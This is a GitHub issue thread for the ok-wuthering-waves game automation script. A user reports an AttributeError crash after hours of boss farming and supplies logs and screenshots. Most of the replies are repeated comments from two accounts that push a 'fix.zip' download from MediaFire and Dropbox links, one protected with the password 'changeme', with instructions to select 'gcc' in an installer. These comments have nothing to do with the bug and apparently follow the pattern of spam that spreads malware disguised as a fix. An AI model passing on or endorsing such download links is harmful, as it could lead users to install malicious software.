### ISSUE TITLE
[BUG]刷取大世界4c一段时间后报错AttributeError: 'NoneType' object has no attribute 'crop_frame'

### ISSUE THREAD

**Issue by qwe4559999** [ok-oldking/ok-wuthering-waves#102]
描述错误:
刷取大世界4c一段时间后报错AttributeError: 'NoneType' object has no attribute 'crop_frame'

复现步骤 按照以下步骤复现行为：

1. 点击 刷取大世界4c（配置是无冠者、第一个雷boss、第二个雷boss）
2. 大约2-3小时以后，在某次击败无冠者后脚本终止报错
3. 看到错误

截图 :
这是最终报错时的刷取次数：
![屏幕截图 2024-08-25 175704](https://github.com/user-attachments/assets/7e5ae3bd-30d2-4a65-a2ee-eb0db0f833e5)
这是screenshot文件夹传来的截图：
![16-19-22 581_Farm World Boss(Must Drop a WayPoint on the Boss First)_original](https://github.com/user-attachments/assets/747390f1-7ca6-4ecc-8e60-96478a63e602)

是否必现:
未知，我会再次测试，若再次报错会更改为大概率

录屏:
无

脚本软件版本：
0.2.10

windows操作系统:
Windows11 家庭中文版 23H2 22631.4037

上传日志:
[logs&screenshots.zip](https://github.com/user-attachments/files/16739691/logs.screenshots.zip)

**Comment by qwe4559999** [comment]
感谢

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
